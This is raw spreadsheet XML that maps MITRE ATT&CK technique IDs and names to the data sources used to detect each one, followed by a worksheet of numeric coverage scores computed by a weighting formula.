        <row r="194">
          <cell r="A194" t="str">
            <v>T1193</v>
          </cell>
          <cell r="B194" t="str">
            <v>Spearphishing Attachment</v>
          </cell>
          <cell r="C194" t="str">
            <v>File monitoring,Packet capture,Network intrusion detection system,Detonation chamber,Email gateway,Mail server</v>
          </cell>
        </row>
        <row r="195">
          <cell r="A195" t="str">
            <v>T1194</v>
          </cell>
          <cell r="B195" t="str">
            <v>Spearphishing via Service</v>
          </cell>
          <cell r="C195" t="str">
            <v>SSL/TLS inspection,Anti-virus,Web proxy</v>
          </cell>
        </row>
        <row r="196">
          <cell r="A196" t="str">
            <v>T1195</v>
          </cell>
          <cell r="B196" t="str">
            <v>Supply Chain Compromise</v>
          </cell>
          <cell r="C196" t="str">
            <v>Web proxy,File monitoring</v>
          </cell>
        </row>
        <row r="197">
          <cell r="A197" t="str">
            <v>T1196</v>
          </cell>
          <cell r="B197" t="str">
            <v>Control Panel Items</v>
          </cell>
          <cell r="C197" t="str">
            <v>API monitoring,Binary file metadata,DLL monitoring,Windows Registry,Windows event logs,Process command-line parameters,Process monitoring</v>
          </cell>
        </row>
        <row r="198">
          <cell r="A198" t="str">
            <v>T1197</v>
          </cell>
          <cell r="B198" t="str">
            <v>BITS Jobs</v>
          </cell>
          <cell r="C198" t="str">
            <v>API monitoring,Packet capture,Windows event logs</v>
          </cell>
        </row>
        <row r="199">
          <cell r="A199" t="str">
            <v>T1198</v>
          </cell>
          <cell r="B199" t="str">
            <v>SIP and Trust Provider Hijacking</v>
          </cell>
          <cell r="C199" t="str">
            <v>API monitoring,Application logs,DLL monitoring,Loaded DLLs,Process monitoring,Windows Registry,Windows event logs</v>
          </cell>
        </row>
        <row r="200">
          <cell r="A200" t="str">
            <v>T1199</v>
          </cell>
          <cell r="B200" t="str">
            <v>Trusted Relationship</v>
          </cell>
          <cell r="C200" t="str">
            <v>Azure activity logs,Stackdriver logs,AWS CloudTrail logs,Application logs,Authentication logs,Third-party application logs</v>
          </cell>
        </row>
        <row r="201">
          <cell r="A201" t="str">
            <v>T1200</v>
          </cell>
          <cell r="B201" t="str">
            <v>Hardware Additions</v>
          </cell>
          <cell r="C201" t="str">
            <v>Asset management,Data loss prevention</v>
          </cell>
        </row>
        <row r="202">
          <cell r="A202" t="str">
            <v>T1201</v>
          </cell>
          <cell r="B202" t="str">
            <v>Password Policy Discovery</v>
          </cell>
          <cell r="C202" t="str">
            <v>Process command-line parameters,Process monitoring</v>
          </cell>
        </row>
        <row r="203">
          <cell r="A203" t="str">
            <v>T1202</v>
          </cell>
          <cell r="B203" t="str">
            <v>Indirect Command Execution</v>
          </cell>
          <cell r="C203" t="str">
            <v>File monitoring,Process monitoring,Process command-line parameters,Windows event logs</v>
          </cell>
        </row>
        <row r="204">
          <cell r="A204" t="str">
            <v>T1203</v>
          </cell>
          <cell r="B204" t="str">
            <v>Exploitation for Client Execution</v>
          </cell>
          <cell r="C204" t="str">
            <v>Anti-virus,System calls,Process monitoring</v>
          </cell>
        </row>
        <row r="205">
          <cell r="A205" t="str">
            <v>T1204</v>
          </cell>
          <cell r="B205" t="str">
            <v>User Execution</v>
          </cell>
          <cell r="C205" t="str">
            <v>Anti-virus,Process command-line parameters,Process monitoring</v>
          </cell>
        </row>
        <row r="206">
          <cell r="A206" t="str">
            <v>T1205</v>
          </cell>
          <cell r="B206" t="str">
            <v>Port Knocking</v>
          </cell>
          <cell r="C206" t="str">
            <v>Packet capture,Netflow/Enclave netflow</v>
          </cell>
        </row>
        <row r="207">
          <cell r="A207" t="str">
            <v>T1206</v>
          </cell>
          <cell r="B207" t="str">
            <v>Sudo Caching</v>
          </cell>
          <cell r="C207" t="str">
            <v>File monitoring,Process command-line parameters</v>
          </cell>
        </row>
        <row r="208">
          <cell r="A208" t="str">
            <v>T1207</v>
          </cell>
          <cell r="B208" t="str">
            <v>DCShadow</v>
          </cell>
          <cell r="C208" t="str">
            <v>API monitoring,Authentication logs,Network protocol analysis,Packet capture</v>
          </cell>
        </row>
        <row r="209">
          <cell r="A209" t="str">
            <v>T1208</v>
          </cell>
          <cell r="B209" t="str">
            <v>Kerberoasting</v>
          </cell>
          <cell r="C209" t="str">
            <v>Windows event logs</v>
          </cell>
        </row>
        <row r="210">
          <cell r="A210" t="str">
            <v>T1209</v>
          </cell>
          <cell r="B210" t="str">
            <v>Time Providers</v>
          </cell>
          <cell r="C210" t="str">
            <v>API monitoring,Binary file metadata,DLL monitoring,File monitoring,Loaded DLLs,Process monitoring</v>
          </cell>
        </row>
        <row r="211">
          <cell r="A211" t="str">
            <v>T1210</v>
          </cell>
          <cell r="B211" t="str">
            <v>Exploitation of Remote Services</v>
          </cell>
          <cell r="C211" t="str">
            <v>Windows Error Reporting,Process monitoring,File monitoring</v>
          </cell>
        </row>
        <row r="212">
          <cell r="A212" t="str">
            <v>T1211</v>
          </cell>
          <cell r="B212" t="str">
            <v>Exploitation for Defense Evasion</v>
          </cell>
          <cell r="C212" t="str">
            <v>Windows Error Reporting,Process monitoring,File monitoring</v>
          </cell>
        </row>
        <row r="213">
          <cell r="A213" t="str">
            <v>T1212</v>
          </cell>
          <cell r="B213" t="str">
            <v>Exploitation for Credential Access</v>
          </cell>
          <cell r="C213" t="str">
            <v>Authentication logs,Windows Error Reporting,Process monitoring</v>
          </cell>
        </row>
        <row r="214">
          <cell r="A214" t="str">
            <v>T1213</v>
          </cell>
          <cell r="B214" t="str">
            <v>Data from Information Repositories</v>
          </cell>
          <cell r="C214" t="str">
            <v>Azure activity logs,AWS CloudTrail logs,Stackdriver logs,OAuth audit logs,Application logs,Authentication logs,Data loss prevention,Third-party application logs</v>
          </cell>
        </row>
        <row r="215">
          <cell r="A215" t="str">
            <v>T1214</v>
          </cell>
          <cell r="B215" t="str">
            <v>Credentials in Registry</v>
          </cell>
          <cell r="C215" t="str">
            <v>Windows Registry,Process command-line parameters,Process monitoring</v>
          </cell>
        </row>
        <row r="216">
          <cell r="A216" t="str">
            <v>T1215</v>
          </cell>
          <cell r="B216" t="str">
            <v>Kernel Modules and Extensions</v>
          </cell>
          <cell r="C216" t="str">
            <v>System calls,Process monitoring,Process command-line parameters</v>
          </cell>
        </row>
        <row r="217">
          <cell r="A217" t="str">
            <v>T1216</v>
          </cell>
          <cell r="B217" t="str">
            <v>Signed Script Proxy Execution</v>
          </cell>
          <cell r="C217" t="str">
            <v>Process monitoring,Process command-line parameters</v>
          </cell>
        </row>
        <row r="218">
          <cell r="A218" t="str">
            <v>T1217</v>
          </cell>
          <cell r="B218" t="str">
            <v>Browser Bookmark Discovery</v>
          </cell>
          <cell r="C218" t="str">
            <v>API monitoring,File monitoring,Process command-line parameters,Process monitoring</v>
          </cell>
        </row>
        <row r="219">
          <cell r="A219" t="str">
            <v>T1218</v>
          </cell>
          <cell r="B219" t="str">
            <v>Signed Binary Proxy Execution</v>
          </cell>
          <cell r="C219" t="str">
            <v>Process monitoring,Process command-line parameters</v>
          </cell>
        </row>
        <row r="220">
          <cell r="A220" t="str">
            <v>T1219</v>
          </cell>
          <cell r="B220" t="str">
            <v>Remote Access Tools</v>
          </cell>
          <cell r="C220" t="str">
            <v>Network intrusion detection system,Network protocol analysis,Process use of network,Process monitoring</v>
          </cell>
        </row>
        <row r="221">
          <cell r="A221" t="str">
            <v>T1220</v>
          </cell>
          <cell r="B221" t="str">
            <v>XSL Script Processing</v>
          </cell>
          <cell r="C221" t="str">
            <v>Process monitoring,Process command-line parameters,Process use of network,DLL monitoring</v>
          </cell>
        </row>
        <row r="222">
          <cell r="A222" t="str">
            <v>T1221</v>
          </cell>
          <cell r="B222" t="str">
            <v>Template Injection</v>
          </cell>
          <cell r="C222" t="str">
            <v>Anti-virus,Email gateway,Network intrusion detection system,Web logs</v>
          </cell>
        </row>
        <row r="223">
          <cell r="A223" t="str">
            <v>T1222</v>
          </cell>
          <cell r="B223" t="str">
            <v>File and Directory Permissions Modification</v>
          </cell>
          <cell r="C223" t="str">
            <v>File monitoring,Process monitoring,Process command-line parameters,Windows event logs</v>
          </cell>
        </row>
        <row r="224">
          <cell r="A224" t="str">
            <v>T1223</v>
          </cell>
          <cell r="B224" t="str">
            <v>Compiled HTML File</v>
          </cell>
          <cell r="C224" t="str">
            <v>File monitoring,Process monitoring,Process command-line parameters</v>
          </cell>
        </row>
        <row r="225">
          <cell r="A225" t="str">
            <v>T1480</v>
          </cell>
          <cell r="B225" t="str">
            <v>Execution Guardrails</v>
          </cell>
          <cell r="C225" t="str">
            <v>Process monitoring</v>
          </cell>
        </row>
        <row r="226">
          <cell r="A226" t="str">
            <v>T1482</v>
          </cell>
          <cell r="B226" t="str">
            <v>Domain Trust Discovery</v>
          </cell>
          <cell r="C226" t="str">
            <v>PowerShell logs,API monitoring,Process command-line parameters,Process monitoring</v>
          </cell>
        </row>
        <row r="227">
          <cell r="A227" t="str">
            <v>T1483</v>
          </cell>
          <cell r="B227" t="str">
            <v>Domain Generation Algorithms</v>
          </cell>
          <cell r="C227" t="str">
            <v>Process use of network,Packet capture,Network device logs,Netflow/Enclave netflow,DNS records</v>
          </cell>
        </row>
        <row r="228">
          <cell r="A228" t="str">
            <v>T1484</v>
          </cell>
          <cell r="B228" t="str">
            <v>Group Policy Modification</v>
          </cell>
          <cell r="C228" t="str">
            <v>Windows event logs</v>
          </cell>
        </row>
        <row r="229">
          <cell r="A229" t="str">
            <v>T1485</v>
          </cell>
          <cell r="B229" t="str">
            <v>Data Destruction</v>
          </cell>
          <cell r="C229" t="str">
            <v>File monitoring,Process command-line parameters,Process monitoring</v>
          </cell>
        </row>
        <row r="230">
          <cell r="A230" t="str">
            <v>T1486</v>
          </cell>
          <cell r="B230" t="str">
            <v>Data Encrypted for Impact</v>
          </cell>
          <cell r="C230" t="str">
            <v>Kernel drivers,File monitoring,Process command-line parameters,Process monitoring</v>
          </cell>
        </row>
        <row r="231">
          <cell r="A231" t="str">
            <v>T1487</v>
          </cell>
          <cell r="B231" t="str">
            <v>Disk Structure Wipe</v>
          </cell>
          <cell r="C231" t="str">
            <v>Kernel drivers,MBR</v>
          </cell>
        </row>
        <row r="232">
          <cell r="A232" t="str">
            <v>T1488</v>
          </cell>
          <cell r="B232" t="str">
            <v>Disk Content Wipe</v>
          </cell>
          <cell r="C232" t="str">
            <v>Kernel drivers,Process monitoring,Process command-line parameters</v>
          </cell>
        </row>
        <row r="233">
          <cell r="A233" t="str">
            <v>T1489</v>
          </cell>
          <cell r="B233" t="str">
            <v>Service Stop</v>
          </cell>
          <cell r="C233" t="str">
            <v>Process command-line parameters,Process monitoring,Windows Registry,API monitoring</v>
          </cell>
        </row>
        <row r="234">
          <cell r="A234" t="str">
            <v>T1490</v>
          </cell>
          <cell r="B234" t="str">
            <v>Inhibit System Recovery</v>
          </cell>
          <cell r="C234" t="str">
            <v>Windows Registry,Services,Windows event logs,Process command-line parameters,Process monitoring</v>
          </cell>
        </row>
        <row r="235">
          <cell r="A235" t="str">
            <v>T1491</v>
          </cell>
          <cell r="B235" t="str">
            <v>Defacement</v>
          </cell>
          <cell r="C235" t="str">
            <v>Packet capture,Web application firewall logs,Web logs,Packet capture</v>
          </cell>
        </row>
        <row r="236">
          <cell r="A236" t="str">
            <v>T1492</v>
          </cell>
          <cell r="B236" t="str">
            <v>Stored Data Manipulation</v>
          </cell>
          <cell r="C236" t="str">
            <v>Application logs,File monitoring</v>
          </cell>
        </row>
        <row r="237">
          <cell r="A237" t="str">
            <v>T1493</v>
          </cell>
          <cell r="B237" t="str">
            <v>Transmitted Data Manipulation</v>
          </cell>
          <cell r="C237" t="str">
            <v>Packet capture,Network protocol analysis</v>
          </cell>
        </row>
        <row r="238">
          <cell r="A238" t="str">
            <v>T1494</v>
          </cell>
          <cell r="B238" t="str">
            <v>Runtime Data Manipulation</v>
          </cell>
          <cell r="C238" t="str">
            <v>File monitoring,Process monitoring</v>
          </cell>
        </row>
        <row r="239">
          <cell r="A239" t="str">
            <v>T1495</v>
          </cell>
          <cell r="B239" t="str">
            <v>Firmware Corruption</v>
          </cell>
          <cell r="C239" t="str">
            <v>BIOS,Component firmware</v>
          </cell>
        </row>
        <row r="240">
          <cell r="A240" t="str">
            <v>T1496</v>
          </cell>
          <cell r="B240" t="str">
            <v>Resource Hijacking</v>
          </cell>
          <cell r="C240" t="str">
            <v>Azure activity logs,Stackdriver logs,AWS CloudTrail logs,Process use of network,Process monitoring,Network protocol analysis,Network device logs</v>
          </cell>
        </row>
        <row r="241">
          <cell r="A241" t="str">
            <v>T1497</v>
          </cell>
          <cell r="B241" t="str">
            <v>Virtualization/Sandbox Evasion</v>
          </cell>
          <cell r="C241" t="str">
            <v>Process monitoring,Process command-line parameters</v>
          </cell>
        </row>
        <row r="242">
          <cell r="A242" t="str">
            <v>T1498</v>
          </cell>
          <cell r="B242" t="str">
            <v>Network Denial of Service</v>
          </cell>
          <cell r="C242" t="str">
            <v>Sensor health and status,Network protocol analysis,Netflow/Enclave netflow,Network intrusion detection system,Network device logs</v>
          </cell>
        </row>
        <row r="243">
          <cell r="A243" t="str">
            <v>T1499</v>
          </cell>
          <cell r="B243" t="str">
            <v>Endpoint Denial of Service</v>
          </cell>
          <cell r="C243" t="str">
            <v>SSL/TLS inspection,Web logs,Web application firewall logs,Network intrusion detection system,Network protocol analysis,Network device logs,Netflow/Enclave netflow</v>
          </cell>
        </row>
        <row r="244">
          <cell r="A244" t="str">
            <v>T1500</v>
          </cell>
          <cell r="B244" t="str">
            <v>Compile After Delivery</v>
          </cell>
          <cell r="C244" t="str">
            <v>Process command-line parameters,Process monitoring,File monitoring</v>
          </cell>
        </row>
        <row r="245">
          <cell r="A245" t="str">
            <v>T1501</v>
          </cell>
          <cell r="B245" t="str">
            <v>Systemd Service</v>
          </cell>
          <cell r="C245" t="str">
            <v>Process command-line parameters,Process monitoring,File monitoring</v>
          </cell>
        </row>
        <row r="246">
          <cell r="A246" t="str">
            <v>T1502</v>
          </cell>
          <cell r="B246" t="str">
            <v>Parent PID Spoofing</v>
          </cell>
          <cell r="C246" t="str">
            <v>Windows event logs,Process monitoring,API monitoring</v>
          </cell>
        </row>
        <row r="247">
          <cell r="A247" t="str">
            <v>T1503</v>
          </cell>
          <cell r="B247" t="str">
            <v>Credentials from Web Browsers</v>
          </cell>
          <cell r="C247" t="str">
            <v>Process monitoring,PowerShell logs,File monitoring,API monitoring</v>
          </cell>
        </row>
        <row r="248">
          <cell r="A248" t="str">
            <v>T1504</v>
          </cell>
          <cell r="B248" t="str">
            <v>PowerShell Profile</v>
          </cell>
          <cell r="C248" t="str">
            <v>Process monitoring,File monitoring,PowerShell logs</v>
          </cell>
        </row>
        <row r="249">
          <cell r="A249" t="str">
            <v>T1505</v>
          </cell>
          <cell r="B249" t="str">
            <v>Server Software Component</v>
          </cell>
          <cell r="C249" t="str">
            <v>File monitoring,Application logs</v>
          </cell>
        </row>
        <row r="250">
          <cell r="A250" t="str">
            <v>T1506</v>
          </cell>
          <cell r="B250" t="str">
            <v>Web Session Cookie</v>
          </cell>
          <cell r="C250" t="str">
            <v>Authentication logs,Office 365 account logs</v>
          </cell>
        </row>
        <row r="251">
          <cell r="A251" t="str">
            <v>T1514</v>
          </cell>
          <cell r="B251" t="str">
            <v>Elevated Execution with Prompt</v>
          </cell>
          <cell r="C251" t="str">
            <v>File monitoring,Process monitoring,API monitoring</v>
          </cell>
        </row>
        <row r="252">
          <cell r="A252" t="str">
            <v>T1518</v>
          </cell>
          <cell r="B252" t="str">
            <v>Software Discovery</v>
          </cell>
          <cell r="C252" t="str">
            <v>Process command-line parameters,Process monitoring,File monitoring</v>
          </cell>
        </row>
        <row r="253">
          <cell r="A253" t="str">
            <v>T1519</v>
          </cell>
          <cell r="B253" t="str">
            <v>Emond</v>
          </cell>
          <cell r="C253" t="str">
            <v>File monitoring,API monitoring</v>
          </cell>
        </row>
        <row r="254">
          <cell r="A254" t="str">
            <v>T1522</v>
          </cell>
          <cell r="B254" t="str">
            <v>Cloud Instance Metadata API</v>
          </cell>
          <cell r="C254" t="str">
            <v>Azure activity logs,AWS CloudTrail logs,Authentication logs</v>
          </cell>
        </row>
        <row r="255">
          <cell r="A255" t="str">
            <v>T1525</v>
          </cell>
          <cell r="B255" t="str">
            <v>Implant Container Image</v>
          </cell>
          <cell r="C255" t="str">
            <v/>
          </cell>
        </row>
        <row r="256">
          <cell r="A256" t="str">
            <v>T1526</v>
          </cell>
          <cell r="B256" t="str">
            <v>Cloud Service Discovery</v>
          </cell>
          <cell r="C256" t="str">
            <v>Azure activity logs,Stackdriver logs,AWS CloudTrail logs</v>
          </cell>
        </row>
        <row r="257">
          <cell r="A257" t="str">
            <v>T1527</v>
          </cell>
          <cell r="B257" t="str">
            <v>Application Access Token</v>
          </cell>
          <cell r="C257" t="str">
            <v>OAuth audit logs,Office 365 account logs</v>
          </cell>
        </row>
        <row r="258">
          <cell r="A258" t="str">
            <v>T1528</v>
          </cell>
          <cell r="B258" t="str">
            <v>Steal Application Access Token</v>
          </cell>
          <cell r="C258" t="str">
            <v>Azure activity logs,OAuth audit logs</v>
          </cell>
        </row>
        <row r="259">
          <cell r="A259" t="str">
            <v>T1529</v>
          </cell>
          <cell r="B259" t="str">
            <v>System Shutdown/Reboot</v>
          </cell>
          <cell r="C259" t="str">
            <v>Windows event logs,Process command-line parameters,Process monitoring</v>
          </cell>
        </row>
        <row r="260">
          <cell r="A260" t="str">
            <v>T1530</v>
          </cell>
          <cell r="B260" t="str">
            <v>Data from Cloud Storage Object</v>
          </cell>
          <cell r="C260" t="str">
            <v>Stackdriver logs,Azure activity logs,AWS CloudTrail logs</v>
          </cell>
        </row>
        <row r="261">
          <cell r="A261" t="str">
            <v>T1531</v>
          </cell>
          <cell r="B261" t="str">
            <v>Account Access Removal</v>
          </cell>
          <cell r="C261" t="str">
            <v>Windows event logs,Process command-line parameters,Process monitoring</v>
          </cell>
        </row>
        <row r="262">
          <cell r="A262" t="str">
            <v>T1534</v>
          </cell>
          <cell r="B262" t="str">
            <v>Internal Spearphishing</v>
          </cell>
          <cell r="C262" t="str">
            <v>SSL/TLS inspection,DNS records,Anti-virus,Web proxy,File monitoring,Mail server,Office 365 trace logs</v>
          </cell>
        </row>
        <row r="263">
          <cell r="A263" t="str">
            <v>T1535</v>
          </cell>
          <cell r="B263" t="str">
            <v>Unused/Unsupported Cloud Regions</v>
          </cell>
          <cell r="C263" t="str">
            <v>Stackdriver logs,Azure activity logs,AWS CloudTrail logs</v>
          </cell>
        </row>
        <row r="264">
          <cell r="A264" t="str">
            <v>T1536</v>
          </cell>
          <cell r="B264" t="str">
            <v>Revert Cloud Instance</v>
          </cell>
          <cell r="C264" t="str">
            <v>Azure OS logs,AWS CloudTrail logs,Azure activity logs,Stackdriver logs,AWS OS logs</v>
          </cell>
        </row>
        <row r="265">
          <cell r="A265" t="str">
            <v>T1537</v>
          </cell>
          <cell r="B265" t="str">
            <v>Transfer Data to Cloud Account</v>
          </cell>
          <cell r="C265" t="str">
            <v>Stackdriver logs,Azure activity logs,AWS CloudTrail logs</v>
          </cell>
        </row>
        <row r="266">
          <cell r="A266" t="str">
            <v>T1538</v>
          </cell>
          <cell r="B266" t="str">
            <v>Cloud Service Dashboard</v>
          </cell>
          <cell r="C266" t="str">
            <v>Office 365 audit logs,Azure activity logs,Stackdriver logs,AWS CloudTrail logs</v>
          </cell>
        </row>
        <row r="267">
          <cell r="A267" t="str">
            <v>T1539</v>
          </cell>
          <cell r="B267" t="str">
            <v>Steal Web Session Cookie</v>
          </cell>
          <cell r="C267" t="str">
            <v>File monitoring,API monitoring</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74"/>
  <sheetViews>
    <sheetView workbookViewId="0">
      <pane ySplit="1" topLeftCell="A35" activePane="bottomLeft" state="frozen"/>
      <selection pane="bottomLeft" activeCell="D74" sqref="D74"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr baseColWidth="10" defaultColWidth="8.83203125" defaultRowHeight="15" x14ac:dyDescent="0.2"/>
  <cols>
    <col min="1" max="1" width="34.83203125" customWidth="1"/>
    <col min="2" max="2" width="86.1640625" customWidth="1"/>
    <col min="3" max="3" width="14.5" style="6" customWidth="1"/>
    <col min="4" max="4" width="11.5" style="6" customWidth="1"/>
    <col min="5" max="5" width="13.33203125" style="6" customWidth="1"/>
    <col min="6" max="6" width="10.6640625" style="4" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A1" s="1" t="s">
        <v>293</v>
      </c>
      <c r="B1" s="1" t="s">
        <v>1</v>
      </c>
      <c r="C1" s="5" t="s">
        <v>284</v>
      </c>
      <c r="D1" s="5" t="s">
        <v>287</v>
      </c>
      <c r="E1" s="5" t="s">
        <v>288</v>
      </c>
      <c r="F1" s="3" t="s">
        <v>294</v>
      </c>
    </row>
    <row r="2" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A2" t="s">
        <v>295</v>
      </c>
      <c r="B2" t="s">
        <v>296</v>
      </c>
      <c r="C2" s="6">
        <v>0</v>
      </c>
      <c r="D2" s="6">
        <v>0</v>
      </c>
      <c r="E2" s="6">
        <v>0</v>
      </c>
      <c r="F2" s="4">
        <f t="shared" ref="F2:F6" si="0">((C2*2)+D2+(E2*2))/5</f>
        <v>0</v>
      </c>
    </row>
    <row r="3" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A3" t="s">
        <v>295</v>
      </c>
      <c r="B3" t="s">
        <v>297</v>
      </c>
      <c r="C3" s="6">
        <v>0</v>
      </c>
      <c r="D3" s="6">
        <v>0</v>
      </c>
      <c r="E3" s="6">
        <v>0</v>
      </c>
      <c r="F3" s="4">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
    </row>
    <row r="4" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A4" t="s">
        <v>295</v>
      </c>
      <c r="B4" t="s">
        <v>298</v>
      </c>
      <c r="C4" s="6">
        <v>0</v>
      </c>
      <c r="D4" s="6">
        <v>0</v>
      </c>
      <c r="E4" s="6">
        <v>0</v>
      </c>
      <c r="F4" s="4">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
    </row>
    <row r="5" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A5" t="s">
        <v>295</v>
      </c>
      <c r="B5" t="s">
        <v>299</v>
      </c>
      <c r="C5" s="6">
        <v>0</v>
      </c>
      <c r="D5" s="6">
        <v>0</v>
      </c>
      <c r="E5" s="6">
        <v>0</v>
      </c>
      <c r="F5" s="4">
        <f>((C5*2)+D5+(E5*2))/5</f>
        <v>0</v>
      </c>
    </row>
    <row r="6" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A6" t="s">
        <v>300</v>
      </c>
      <c r="C6" s="6">
        <v>0</v>
      </c>
      <c r="D6" s="6">
        <v>0</v>
      </c>
      <c r="E6" s="6">
        <v>0</v>
      </c>
      <c r="F6" s="4">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
    </row>
    <row r="7" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A7" t="s">
        <v>301</v>
      </c>
      <c r="B7" t="s">
        <v>302</v>
      </c>
      <c r="C7" s="6">
        <v>0</v>
      </c>
      <c r="D7" s="6">
        <v>0</v>
      </c>
      <c r="E7" s="6">
        <v>0</v>
      </c>
      <c r="F7" s="4">
        <f>((C7*2)+D7+(E7*2))/5</f>
        <v>0</v>
      </c>
    </row>
    <row r="8" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A8" t="s">
        <v>301</v>
      </c>
      <c r="B8" t="s">
        <v>303</v>
      </c>
      <c r="C8" s="6">
        <v>0</v>
      </c>
      <c r="D8" s="6">
        <v>0</v>
      </c>
      <c r="E8" s="6">
        <v>0</v>
      </c>
      <c r="F8" s="4">
        <f t="shared" ref="F8:F70" si="1">((C8*2)+D8+(E8*2))/5</f>
        <v>0</v>
      </c>
    </row>
    <row r="9" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A9" t="s">
        <v>301</v>
      </c>
      <c r="B9" t="s">
        <v>304</v>
      </c>
      <c r="C9" s="6">
        <v>0</v>
      </c>
      <c r="D9" s="6">
        <v>0</v>
      </c>
      <c r="E9" s="6">
        <v>0</v>
      </c>
      <c r="F9" s="4">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
    </row>
    <row r="10" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A10" t="s">
        <v>305</v>
      </c>
      <c r="C10" s="6">
        <v>0</v>
      </c>
      <c r="D10" s="6">
        <v>0</v>
      </c>
      <c r="E10" s="6">
        <v>0</v>
      </c>
      <c r="F10" s="4">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
    </row>
    <row r="11" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A11" t="s">
        <v>306</v>
      </c>
      <c r="C11" s="6">
        <v>0</v>
      </c>
      <c r="D11" s="6">
        <v>0</v>
      </c>
      <c r="E11" s="6">
        <v>0</v>
      </c>
      <c r="F11" s="4">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
    </row>
    <row r="12" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A12" t="s">
        <v>307</v>
      </c>
      <c r="B12" t="s">
        <v>308</v>
      </c>
      <c r="C12" s="6">
        <v>0</v>
      </c>
      <c r="D12" s="6">
        <v>0</v>
      </c>
      <c r="E12" s="6">
        <v>0</v>
      </c>
      <c r="F12" s="4">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
    </row>
    <row r="13" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A13" t="s">
        <v>309</v>
      </c>
      <c r="B13" t="s">
        <v>334</v>
      </c>
      <c r="C13" s="6">
        <v>0</v>
      </c>
      <c r="D13" s="6">
        <v>0</v>
      </c>
      <c r="E13" s="6">
        <v>0</v>
      </c>
      <c r="F13" s="4">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
    </row>
    <row r="14" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A14" t="s">
        <v>310</v>
      </c>
      <c r="B14" t="s">
        <v>311</v>
      </c>
      <c r="C14" s="6">
        <v>5</v>
      </c>
      <c r="D14" s="6">
        <v>5</v>
      </c>
      <c r="E14" s="6">
        <v>5</v>
      </c>
      <c r="F14" s="4">
        <f t="shared" si="1"/>
        <v>5</v>
      </c>
    </row>
    <row r="15" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A15" t="s">
        <v>312</v>
      </c>
      <c r="C15" s="6">
        <v>0</v>
      </c>
      <c r="D15" s="6">
        <v>0</v>
      </c>
      <c r="E15" s="6">
        <v>0</v>
      </c>
      <c r="F15" s="4">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
    </row>
    <row r="16" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A16" t="s">
        <v>313</v>
      </c>
      <c r="C16" s="6">
        <v>0</v>
      </c>
      <c r="D16" s="6">
        <v>0</v>
      </c>
      <c r="E16" s="6">
        <v>0</v>
      </c>
      <c r="F16" s="4">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
    </row>
    <row r="17" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A17" t="s">
        <v>314</v>
      </c>
      <c r="C17" s="6">
        <v>0</v>
      </c>
      <c r="D17" s="6">
        <v>0</v>
      </c>
      <c r="E17" s="6">
        <v>0</v>
      </c>
      <c r="F17" s="4">
        <f>((C17*2)+D17+(E17*2))/5</f>
        <v>0</v>
      </c>
    </row>
    <row r="18" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A18" t="s">
        <v>315</v>
      </c>
      <c r="B18" t="s">
        <v>316</v>
      </c>
      <c r="C18" s="6">
        <v>0</v>
      </c>
      <c r="D18" s="6">
        <v>0</v>
      </c>
      <c r="E18" s="6">
        <v>0</v>
      </c>
      <c r="F18" s="4">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
    </row>
    <row r="19" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A19" t="s">
        <v>315</v>
      </c>
      <c r="B19" t="s">
        <v>317</v>
      </c>
      <c r="C19" s="6">
        <v>5</v>
      </c>
      <c r="D19" s="6">
        <v>5</v>
      </c>
      <c r="E19" s="6">
        <v>5</v>
      </c>
      <c r="F19" s="4">
        <f>((C19*2)+D19+(E19*2))/5</f>
        <v>5</v>
      </c>
    </row>
    <row r="20" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A20" t="s">
        <v>315</v>
      </c>
      <c r="B20" t="s">
        <v>318</v>
      </c>
      <c r="C20" s="6">
        <v>5</v>
      </c>
      <c r="D20" s="6">
        <v>5</v>
      </c>
      <c r="E20" s="6">
        <v>5</v>
      </c>
      <c r="F20" s="4">
        <f>((C20*2)+D20+(E20*2))/5</f>
        <v>5</v>
      </c>
    </row>
    <row r="21" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A21" t="s">
        <v>315</v>
      </c>
      <c r="B21" t="s">
        <v>319</v>
      </c>
      <c r="C21" s="6">
        <v>5</v>
      </c>
      <c r="D21" s="6">
        <v>5</v>
      </c>
      <c r="E21" s="6">
        <v>5</v>
      </c>
      <c r="F21" s="4">
        <f>((C21*2)+D21+(E21*2))/5</f>
        <v>5</v>
      </c>
    </row>
    <row r="22" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A22" t="s">
        <v>315</v>
      </c>
      <c r="B22" t="s">
        <v>320</v>
      </c>
      <c r="C22" s="6">
        <v>0</v>
      </c>
      <c r="D22" s="6">
        <v>0</v>
      </c>
      <c r="E22" s="6">
        <v>0</v>
      </c>
      <c r="F22" s="4">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
    </row>
    <row r="23" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A23" t="s">
        <v>321</v>
      </c>
      <c r="C23" s="6">
        <v>0</v>
      </c>
      <c r="D23" s="6">
